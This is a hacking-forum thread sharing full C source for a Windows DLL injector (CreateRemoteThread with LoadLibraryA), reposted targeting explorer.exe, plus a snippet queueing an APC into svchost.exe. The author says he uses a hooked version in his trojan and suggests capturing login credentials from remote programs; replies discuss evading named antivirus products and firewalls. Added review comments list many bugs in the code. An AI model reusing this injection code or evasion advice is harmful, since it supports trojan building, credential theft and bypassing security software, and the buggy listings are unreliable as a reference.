  1. #1
    Senior Member zorgion's Avatar

    [Win32] Injector v0.1

    My way of dll-injection.

    Code:
    #include <windows.h>
    #include <tlhelp32.h>
    #include <stdio.h>
    
    // Compile-time configuration: the named mutex created in main(), the
    // executable name that GetProcessID() looks for in the process snapshot
    // (exact, case-sensitive match), and the console window title.
    #define MUTEX_NAME		"MyInjector"
    #define PROCESS_NAME	"someprocess.exe"
    #define TITLE_NAME		"MyInjector"
    
    // Global state shared by every function in this file. Error reporting
    // works by writing the name of the failing Win32 call into cGetLastError;
    // main() prints that name together with GetLastError(). Nothing in the
    // file ever clears cGetLastError again, which matters because main()
    // compares it against "" after InjectDLL() returns.
    struct TARGET_PROCESS_INFO {
    	char cGetLastError[MAX_PATH];	// name of the last failing API ("" only while still untouched)
    	char cProcessName[MAX_PATH];	// not referenced anywhere in this listing
    	char cDLLName[MAX_PATH];		// this executable's path with its last three characters replaced by "dll"
    	char cLoaderName[MAX_PATH];		// this executable's path as returned by GetModuleFileName
    	// HWND hTargetWnd; // Comes in version 2
    };
    // The tag is used as a type name without a typedef, so this line only
    // compiles as C++; a C build would need "struct TARGET_PROCESS_INFO TPI;".
    TARGET_PROCESS_INFO TPI;
    
    // Returns FALSE, after recording "GetFileAttributes" in TPI.cGetLastError,
    // when GetLastError() reads ERROR_FILE_NOT_FOUND or ERROR_PATH_NOT_FOUND
    // following the GetFileAttributes(cFile) call; TRUE for every other code.
    //
    // NOTE(review): the return value of GetFileAttributes() is discarded and
    // the thread's last-error value is not reset first, so a "not found" code
    // left behind by an earlier call can make an existing file look missing,
    // and any other failure (access denied, for instance) is reported as
    // "exists". Comparing the return value with INVALID_FILE_ATTRIBUTES would
    // avoid both problems.
    BOOL fExists(const char* cFile) {
    	GetFileAttributes(cFile);
    	switch(GetLastError()) {
    		case ERROR_FILE_NOT_FOUND: {
    			strcpy(TPI.cGetLastError,"GetFileAttributes");
    			return FALSE;
    		}
    		case ERROR_PATH_NOT_FOUND: {
    			strcpy(TPI.cGetLastError,"GetFileAttributes");
    			return FALSE;
    		}
    		default: break;
    	}
    	return TRUE;
    }
    
    // Derives the DLL path from this executable's own path: GetModuleFileName()
    // writes the loader's path into cFile, that path is saved in
    // TPI.cLoaderName, and the last three characters of TPI.cDLLName are
    // overwritten with "dll" (so "...\loader.exe" becomes "...\loader.dll").
    // Returns FALSE, with "GetModuleFileName" recorded in TPI.cGetLastError,
    // when the lookup fails.
    //
    // NOTE(review): the function fills cFile but reads TPI.cDLLName, so it is
    // only correct when the caller passes TPI.cDLLName as cFile (main() does).
    // GetModuleFileName() is called up to three times, and because its return
    // value is a character count, the comparison with ERROR_INSUFFICIENT_BUFFER
    // (122) rejects any path that is exactly 122 characters long instead of
    // detecting truncation. strlen()-3 is also unsafe for a path shorter than
    // three characters, and the three-character replacement assumes a
    // three-letter extension.
    BOOL GetDLLName(char *cFile) {
    	if(GetModuleFileName(NULL,cFile,MAX_PATH) == NULL) {
    		strcpy(TPI.cGetLastError,"GetModuleFileName");
    		return FALSE;
    	}
    	else if(GetModuleFileName(NULL,cFile,MAX_PATH) == ERROR_INSUFFICIENT_BUFFER) {
    		strcpy(TPI.cGetLastError,"GetModuleFileName");
    		return FALSE;
    	}
    	else if(GetModuleFileName(NULL,cFile,MAX_PATH)) {
    		strcpy(TPI.cLoaderName,TPI.cDLLName);
    		strcpy(&TPI.cDLLName[strlen(TPI.cDLLName)-3],"dll");
    		return TRUE;
    	}
    	return FALSE;
    }
    
    // Looks up the process id of the first snapshot entry whose szExeFile
    // equals cProcessName (strcmp: exact, case-sensitive). Returns the id, or
    // 0 (spelled NULL) when nothing matches or the snapshot cannot be taken;
    // the name of the failing API is written to TPI.cGetLastError.
    //
    // NOTE(review): CreateToolhelp32Snapshot() signals failure with
    // INVALID_HANDLE_VALUE rather than NULL, so the first check never fires.
    // The entry filled in by Process32First() is never compared because the
    // loop begins with Process32Next(). Running out of entries is recorded as
    // a "Process32Next" error, so each round of the polling loop in main()
    // leaves that string in TPI.cGetLastError although nothing failed.
    DWORD GetProcessID(char cProcessName[MAX_PATH]) {
    	PROCESSENTRY32 ProcessEntry32 = { 0 };
    	HANDLE hSnapshot 	= NULL;
    	if((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == NULL) {
    		strcpy(TPI.cGetLastError,"CreateToolhelp32Snapshot");
    		return NULL;
    	}
    	if(Process32First(hSnapshot,&ProcessEntry32) == FALSE) {
    		strcpy(TPI.cGetLastError,"Process32First");
    		if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return NULL;
    	}
    	while(Process32Next(hSnapshot,&ProcessEntry32) != FALSE) {
    		if(strcmp(cProcessName,ProcessEntry32.szExeFile) == 0) {
    			if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    			return ProcessEntry32.th32ProcessID;
    		}
    	}
    	// Reached both when the name is absent and when enumeration stops
    	// for any other reason; the two cases are not told apart.
    	strcpy(TPI.cGetLastError,"Process32Next");
    	if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    	return NULL;;
    }
    
    // Loads cDllName into the process named cProcessName with the
    // CreateRemoteThread/LoadLibraryA technique spelled out below: open the
    // target with PROCESS_ALL_ACCESS, commit MAX_PATH bytes inside it, copy the
    // DLL path there, and start a remote thread whose start routine is
    // LoadLibraryA with that buffer as its argument. Returns TRUE once the
    // thread has been created; FALSE after writing the failing API name to
    // TPI.cGetLastError (a later CloseHandle/VirtualFreeEx failure on the
    // error paths overwrites that name).
    //
    // The LoadLibraryA address is resolved in this process (GetModuleHandle /
    // GetProcAddress) and used unchanged in the target, so the code assumes
    // kernel32.dll is mapped at the same address in both. From a detection
    // standpoint every step here (OpenProcess, VirtualAllocEx,
    // WriteProcessMemory, CreateRemoteThread) is a cross-process operation
    // that endpoint monitoring commonly records; post #8 below makes the same
    // observation.
    //
    // NOTE(review): the HANDLE returned by CreateRemoteThread() is never
    // closed, and all MAX_PATH bytes of cDllName are copied regardless of the
    // string's length (in bounds only because the caller's buffer is MAX_PATH
    // wide).
    BOOL InjectDLL(char cProcessName[MAX_PATH],char cDllName[MAX_PATH]) {
    	FARPROC LoadLibAddress 	= NULL;
    	LPVOID lpAddress 		= NULL;
    	DWORD PID				= NULL;
    	HMODULE hModKernel32 	= NULL;
    	HANDLE hProcess 		= NULL;
    	if((PID = GetProcessID(cProcessName)) == NULL) return FALSE;
    	if((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID)) == NULL) {
    		strcpy(TPI.cGetLastError,"OpenProcess");
    		return FALSE;
    	}
    	if((hModKernel32 = GetModuleHandle("kernel32.dll")) == NULL) {
    		strcpy(TPI.cGetLastError,"GetModuleHandle");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}	
    	if((LoadLibAddress = GetProcAddress(hModKernel32,"LoadLibraryA")) == NULL) {
    		strcpy(TPI.cGetLastError,"GetProcAddress");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if((lpAddress = VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)) == NULL) {
    		strcpy(TPI.cGetLastError,"VirtualAllocEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(WriteProcessMemory(hProcess,lpAddress,cDllName,MAX_PATH,NULL) == NULL) {
    		strcpy(TPI.cGetLastError,"WriteProcessMemory");
    		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(CreateRemoteThread(hProcess,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibAddress,lpAddress,NULL,NULL) == NULL) {
    		strcpy(TPI.cGetLastError,"CreateRemoteThread");
    		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    	if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    	return TRUE;
    }
    
    // Entry point: creates the MUTEX_NAME mutex, sets the console title,
    // derives the DLL path from the loader's own path, checks that the file
    // exists, polls every 10 ms until PROCESS_NAME is running, then calls
    // InjectDLL() and reports the outcome. Blocks on getchar() before leaving
    // on every path except the mutex failure.
    //
    // NOTE(review): several things do not do what the comments and messages
    // claim. CreateMutex() succeeds even when the mutex already exists, so
    // without a GetLastError() == ERROR_ALREADY_EXISTS check a second instance
    // is not prevented. The "else if" calls InjectDLL() a second time, so a
    // successful first call is followed by another injection of the same DLL.
    // The "failed to close process handle" message is printed whenever
    // TPI.cGetLastError is non-empty, which is already the case after one
    // round of the polling loop (GetProcessID() writes "Process32Next" there).
    // The exit codes are inverted (0 on error, 1 on success), and %d is used
    // for the DWORD returned by GetLastError(), where %lu is the matching
    // conversion.
    int main( ) {
    	BOOL bPrinted = FALSE;
    	// Only these two fields are cleared; cGetLastError relies on TPI being a
    	// zero-initialised global.
    	ZeroMemory(TPI.cDLLName,MAX_PATH);
    	ZeroMemory(TPI.cLoaderName,MAX_PATH);
    	HANDLE hMutex = NULL;
    	if((hMutex = CreateMutex(NULL,FALSE,MUTEX_NAME)) == NULL) {
    		ExitProcess(0); // We don't want multiple windows of our application.
    	}
    	if(SetConsoleTitle(TITLE_NAME) == NULL) {
    		printf(	"Error: 'SetConsoleTitle' failed. Looking up error message with GetLastError():\n %d \n",GetLastError());
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	// GetDLLName() depends on receiving TPI.cDLLName here, not a copy.
    	if(GetDLLName(TPI.cDLLName) == FALSE) {
    		if(strcmp(TPI.cGetLastError,"") != 0) {
    			printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		}
    		else {
    			printf("Error: DLL-file not found !\n");
    		}
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	if(fExists(TPI.cDLLName) == FALSE) {
    		printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	// Busy-wait with a 10 ms sleep; each miss writes "Process32Next" into
    	// TPI.cGetLastError.
    	while(GetProcessID(PROCESS_NAME) == NULL) {
    		if(bPrinted == FALSE) {
    			printf("Waiting for '%s' to start...\n",PROCESS_NAME);
    			bPrinted = TRUE;
    		}
    		Sleep(10);
    	}
    	if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == FALSE) {
    		printf("Error: '%s' failed.\nLooking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		getchar();
    	}
    	else if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == TRUE) {
    		if(strcmp(TPI.cGetLastError,"") != 0) {
    			printf("Error: Injection complete, but failed to close process handle because 'CloseHandle' failed.\nLooking up error message with GetLastError():\n %s \n",TPI.cGetLastError);
    		}
    		else {
    			printf("Success: Injection complete, 0 errors");
    		}
    		getchar();
    	}
    	CloseHandle(hMutex);
    	return 1;
    }
    Please report bugs or anything else.

    In the next version:
    - other methods of injection
    - GUI
    - make it possible to store a dll-file as shellcode into the loader (while running the program) and inject it. (if my plan works as it should)

  2. #2
    Senior Member
    what do u wanna use this injector for?
    and what advantages does it have?

  3. #3
    Senior Member zorgion's Avatar
    I did not plan to use it in close future, but could be a nice future too add to any remote tools. (An example would be if a program on the remote computer has a program that required login info and you could not get the password by sending WM_GETTEXT to the window handler. Then you could inject your own dll-file into the program and hook the functions for the window handling (or something like that))

    And the program is only designed to be used before startup of the target, then you could do whatever you like in your dll-file. (I'l first test hooking getprocaddress)

    There are other methods allowing you to inject code in a running process, but then again you would have to freeze the process and set debug privs. and that could be detected by the remote process. (They can also detected this easy if they want, but I'm going to add some more stuff in the next version that makes it a bit more harder to detected.)

  4. #4
    Junior Member silk's Avatar
    Nice code, very clear (except for the tab inconsistencies, which I assume happened when you posted)
    --
    // K
    --

  5. #5
    Member coder_gate's Avatar
    i dont known use your source,can you repair my source ???
    Code:
    #include <windows.h>
    #include <tlhelp32.h>
    #include <stdio.h>
    
    // Same configuration macros as the post #1 listing; only the target
    // executable name differs. PROCESS_NAME is matched case-sensitively by
    // GetProcessID() below.
    #define MUTEX_NAME		"MyInjector"
    #define PROCESS_NAME	"explorer.exe"
    #define TITLE_NAME		"MyInjector"
    
    // Shared global state, unchanged from the post #1 listing. Helpers record
    // the name of a failing Win32 call in cGetLastError and main() prints it;
    // no code ever resets the field to "".
    struct TARGET_PROCESS_INFO {
    	char cGetLastError[MAX_PATH];	// name of the last failing API
    	char cProcessName[MAX_PATH];	// not referenced in this listing
    	char cDLLName[MAX_PATH];		// loader path with its last three characters replaced by "dll"
    	char cLoaderName[MAX_PATH];		// loader path as returned by GetModuleFileName
    	// HWND hTargetWnd; // Comes in version 2
    };
    // Tag used as a type name without typedef: compiles as C++ only.
    TARGET_PROCESS_INFO TPI;
    
    // Existence check copied from the post #1 listing: FALSE when
    // GetLastError() reads ERROR_FILE_NOT_FOUND/ERROR_PATH_NOT_FOUND after
    // GetFileAttributes(cFile), TRUE otherwise.
    //
    // NOTE(review): the GetFileAttributes() result is discarded and the
    // last-error value is not reset first, so a stale code decides the
    // answer; checking the result against INVALID_FILE_ATTRIBUTES is the
    // reliable form.
    BOOL fExists(const char* cFile) {
    	GetFileAttributes(cFile);
    	switch(GetLastError()) {
    		case ERROR_FILE_NOT_FOUND: {
    			strcpy(TPI.cGetLastError,"GetFileAttributes");
    			return FALSE;
    		}
    		case ERROR_PATH_NOT_FOUND: {
    			strcpy(TPI.cGetLastError,"GetFileAttributes");
    			return FALSE;
    		}
    		default: break;
    	}
    	return TRUE;
    }
    
    // Copied from the post #1 listing: fills cFile with the loader's own path,
    // saves it in TPI.cLoaderName and rewrites the last three characters of
    // TPI.cDLLName as "dll". Returns FALSE when GetModuleFileName() fails.
    //
    // NOTE(review): writes cFile but reads TPI.cDLLName, so it only works when
    // the caller passes TPI.cDLLName; GetModuleFileName() is called up to three
    // times and its length result is compared against the error code
    // ERROR_INSUFFICIENT_BUFFER, which does not detect truncation.
    BOOL GetDLLName(char *cFile) {
    	if(GetModuleFileName(NULL,cFile,MAX_PATH) == NULL) {
    		strcpy(TPI.cGetLastError,"GetModuleFileName");
    		return FALSE;
    	}
    	else if(GetModuleFileName(NULL,cFile,MAX_PATH) == ERROR_INSUFFICIENT_BUFFER) {
    		strcpy(TPI.cGetLastError,"GetModuleFileName");
    		return FALSE;
    	}
    	else if(GetModuleFileName(NULL,cFile,MAX_PATH)) {
    		strcpy(TPI.cLoaderName,TPI.cDLLName);
    		strcpy(&TPI.cDLLName[strlen(TPI.cDLLName)-3],"dll");
    		return TRUE;
    	}
    	return FALSE;
    }
    
    // Copied from the post #1 listing: returns the th32ProcessID of the first
    // Toolhelp entry whose szExeFile equals cProcessName (case-sensitive), or
    // 0 (spelled NULL) with the failing API name in TPI.cGetLastError.
    //
    // NOTE(review): CreateToolhelp32Snapshot() fails with INVALID_HANDLE_VALUE,
    // not NULL, so that check never fires; the Process32First() entry is never
    // compared; and exhausting the list is recorded as a "Process32Next"
    // error, which the polling loop in main() triggers on every miss.
    DWORD GetProcessID(char cProcessName[MAX_PATH]) {
    	PROCESSENTRY32 ProcessEntry32 = { 0 };
    	HANDLE hSnapshot 	= NULL;
    	if((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == NULL) {
    		strcpy(TPI.cGetLastError,"CreateToolhelp32Snapshot");
    		return NULL;
    	}
    	if(Process32First(hSnapshot,&ProcessEntry32) == FALSE) {
    		strcpy(TPI.cGetLastError,"Process32First");
    		if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return NULL;
    	}
    	while(Process32Next(hSnapshot,&ProcessEntry32) != FALSE) {
    		if(strcmp(cProcessName,ProcessEntry32.szExeFile) == 0) {
    			if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    			return ProcessEntry32.th32ProcessID;
    		}
    	}
    	strcpy(TPI.cGetLastError,"Process32Next");
    	if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    	return NULL;;
    }
    
    // Copied from the post #1 listing: CreateRemoteThread/LoadLibraryA
    // injection of cDllName into the process named cProcessName. Opens the
    // target with PROCESS_ALL_ACCESS, commits MAX_PATH bytes there, writes the
    // DLL path and starts a remote thread at LoadLibraryA. TRUE once the thread
    // exists, FALSE with the failing API name in TPI.cGetLastError.
    //
    // The LoadLibraryA address comes from this process and is reused in the
    // target, so kernel32.dll is assumed to be mapped at the same address in
    // both. Each cross-process call here (OpenProcess, VirtualAllocEx,
    // WriteProcessMemory, CreateRemoteThread) is the kind of event endpoint
    // monitoring records, as post #8 below also points out.
    //
    // NOTE(review): the thread HANDLE from CreateRemoteThread() is never
    // closed, and MAX_PATH bytes are copied from cDllName regardless of the
    // string's length.
    BOOL InjectDLL(char cProcessName[MAX_PATH],char cDllName[MAX_PATH]) {
    	FARPROC LoadLibAddress 	= NULL;
    	LPVOID lpAddress 		= NULL;
    	DWORD PID				= NULL;
    	HMODULE hModKernel32 	= NULL;
    	HANDLE hProcess 		= NULL;
    	if((PID = GetProcessID(cProcessName)) == NULL) return FALSE;
    	if((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID)) == NULL) {
    		strcpy(TPI.cGetLastError,"OpenProcess");
    		return FALSE;
    	}
    	if((hModKernel32 = GetModuleHandle("kernel32.dll")) == NULL) {
    		strcpy(TPI.cGetLastError,"GetModuleHandle");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}	
    	if((LoadLibAddress = GetProcAddress(hModKernel32,"LoadLibraryA")) == NULL) {
    		strcpy(TPI.cGetLastError,"GetProcAddress");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if((lpAddress = VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)) == NULL) {
    		strcpy(TPI.cGetLastError,"VirtualAllocEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(WriteProcessMemory(hProcess,lpAddress,cDllName,MAX_PATH,NULL) == NULL) {
    		strcpy(TPI.cGetLastError,"WriteProcessMemory");
    		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(CreateRemoteThread(hProcess,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibAddress,lpAddress,NULL,NULL) == NULL) {
    		strcpy(TPI.cGetLastError,"CreateRemoteThread");
    		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    		return FALSE;
    	}
    	if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
    	if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
    	return TRUE;
    }
    
    // Entry point, copied from the post #1 listing: mutex, console title,
    // DLL path derived from the loader path, existence check, 10 ms polling
    // until PROCESS_NAME is running, then InjectDLL() and a result message.
    //
    // NOTE(review): CreateMutex() also succeeds when the mutex already exists
    // (no ERROR_ALREADY_EXISTS check), so a second instance is not prevented;
    // the "else if" invokes InjectDLL() a second time after a successful first
    // call; the "failed to close process handle" branch fires whenever
    // TPI.cGetLastError is non-empty, which one round of the polling loop
    // already guarantees; exit codes are inverted (0 on error, 1 on success);
    // and %d is used for the DWORD from GetLastError() instead of %lu.
    int main( ) {
    	BOOL bPrinted = FALSE;
    	ZeroMemory(TPI.cDLLName,MAX_PATH);
    	ZeroMemory(TPI.cLoaderName,MAX_PATH);
    	HANDLE hMutex = NULL;
    	if((hMutex = CreateMutex(NULL,FALSE,MUTEX_NAME)) == NULL) {
    		ExitProcess(0); // We don't want multiple windows of our application.
    	}
    	if(SetConsoleTitle(TITLE_NAME) == NULL) {
    		printf(	"Error: 'SetConsoleTitle' failed. Looking up error message with GetLastError():\n %d \n",GetLastError());
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	if(GetDLLName(TPI.cDLLName) == FALSE) {
    		if(strcmp(TPI.cGetLastError,"") != 0) {
    			printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		}
    		else {
    			printf("Error: DLL-file not found !\n");
    		}
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	if(fExists(TPI.cDLLName) == FALSE) {
    		printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		getchar();
    		CloseHandle(hMutex);
    		return 0;
    	}
    	while(GetProcessID(PROCESS_NAME) == NULL) {
    		if(bPrinted == FALSE) {
    			printf("Waiting for '%s' to start...\n",PROCESS_NAME);
    			bPrinted = TRUE;
    		}
    		Sleep(10);
    	}
    	if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == FALSE) {
    		printf("Error: '%s' failed.\nLooking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
    		getchar();
    	}
    	else if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == TRUE) {
    		if(strcmp(TPI.cGetLastError,"") != 0) {
    			printf("Error: Injection complete, but failed to close process handle because 'CloseHandle' failed.\nLooking up error message with GetLastError():\n %s \n",TPI.cGetLastError);
    		}
    		else {
    			printf("Success: Injection complete, 0 errors");
    		}
    		getchar();
    	}
    	CloseHandle(hMutex);
    	return 1;
    }

  6. #6
    Senior Member
    any injection method (at runtime) is easy detectable. one reason is that any new thread begins it's execution from KiUserApcDispatcher that can be easy hooked by remote process and this is hard to fuckup in usermode
    another disadvantage of ur method - u have to store dll on disk.

  7. #7
    Senior Member zorgion's Avatar
    Almost correct! The code can easy be modified to accept shellcode! And I said it was easy to detect ( I did not include the part where I hook some API's I know beeing used to check for calls and stuff because I use my code in a trojan. But then again all of this could also easy be detected, but not by a 'normal' computer user ).

    As I said, the modified part of the code (with API hooking) I use for my trojan. I did not say this method I posted was undetectable, did I?

    There are many more alternative methods. You got one example (not so mutch used) RhCreateStealthRemoteThread.

    The best method I think would be manual-map.
    http://www.edgeofnowhere.cc/viewtopic.php?t=305739

  8. #8
    Senior Member
    its not the code u have to use in trojan. any firewall or antivirus with proactive defend will alert ur injection in like 2 points: OpenProcess, CreateRemoteThread.
    the easiest way of injecting dll for trojan is adding APC to alertable svchost's thread. and as far as i know it is still undetectable by some firewalls
    Code:
    // Fragment, not a compilable unit: szName, GetTIDbyName() and the
    // IMAGE_FIRST_EXPORT_DIRECTORY macro are not defined anywhere on this
    // page, and no header declaring NtQueueApcThread or PKNORMAL_ROUTINE is
    // shown.
    PVOID pMZ=GetModuleHandle(TEXT("ntdll.dll"));	
    szName =(LPSTR)((IMAGE_FIRST_EXPORT_DIRECTORY(pMZ))->Name+(DWORD)pMZ+2);
    NtQueueApcThread(OpenThread(THREAD_SET_CONTEXT,FALSE,(DWORD)(DWORD_PTR)GetTIDbyName("svchost.exe")),(PKNORMAL_ROUTINE)LoadLibraryA,szName,0,0);
    Detours is stable, but shitty injection lib. manual-map is also easy detectable and not original method. search for more interesting ones.

    btw, i didnt say anything about hooks in ur process. i said about hooks been made by remote process in it's address space.

  9. #9
    Senior Member zorgion's Avatar
    You could always use the API's dynamically
    Or RtlCreateUserThread :p

    Anyway, not to many AV detect the old method soo, I guess I ain't gonna wry about it ( I dear you to find a AV, today that does. I know at least NOD, BitDefender, Avast & AVG does not. Gonna test with Norman, Norton AV, F-Secure, Comodo AntiVirus, McAfee & Kaspersky)

  10. #10
    Senior Member
    Or RtlCreateUserThread
    u still need open process for it, but nice try.. if u find method of how to avoid writeprocmem api call (not by use NtWriteVirtualMemory, look on sections) it will be pretty nice code dont forget about CsrClientCallServer in this case

    Anyway, not to many AV detect the old method soo
    its mostly detected by firewalls (btw try to bypass ZoneAlarm ) ). and antiviruses like Kaspersky...
